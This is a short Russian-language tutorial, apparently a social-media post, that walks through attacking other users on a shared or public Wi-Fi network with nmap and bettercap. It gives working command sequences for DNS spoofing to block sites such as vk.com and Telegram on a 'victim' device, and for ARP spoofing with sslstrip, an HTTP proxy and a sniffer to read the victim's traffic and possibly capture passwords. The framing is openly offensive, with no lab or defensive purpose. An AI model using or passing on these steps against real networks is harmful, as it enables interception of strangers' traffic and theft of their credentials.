Hello, сегодня будем учиться управлять трафиком на чужих устройствах, и просматривать весь трафик жертвы (так же, в некоторых случаях, можно перехватить пароли)
То что я вам расскажу сегодня, можно использовать в общественных точках доступа)
Установка:
apt -y install golang
apt -y install bettercap
Для начала нам надо узнать какие устройства подключены к Wi-FI
nmap 192.168.12.1/24
- 192.168.12.1 IP роутера (24 - маска сети)
Запускаем Bettercap, с его помощью мы будем перехватывать данные и управлять сетью - sudo bettecap
- 1. Блокируем сайты!
Пишем через запятую сайты, которые хотим заблокировать:
set dns.spoof.domains m.vk.com, telegram.org, my.telegram.org
Указываем локальный IP жертвы который мы получили из сканирования NMAP:
set dns.spoof.address 192.168.12.IP
dns.spoof on - START
После того как мы запустили dns-spoof, жертва не сможет зайти на указанный вами сайт 😈 (Скрин с телефона жертвы)
- 2. Просматриваем трафик жертвы!
1. set http.proxy.sslstrip true
2. events.clear
3. set net.sniff.verbose false
4. set net.sniff.local true
5. set arp.spoof.targets IP жертвы
6. arp.spoof on
7. http.proxy on
8. net.sniff on
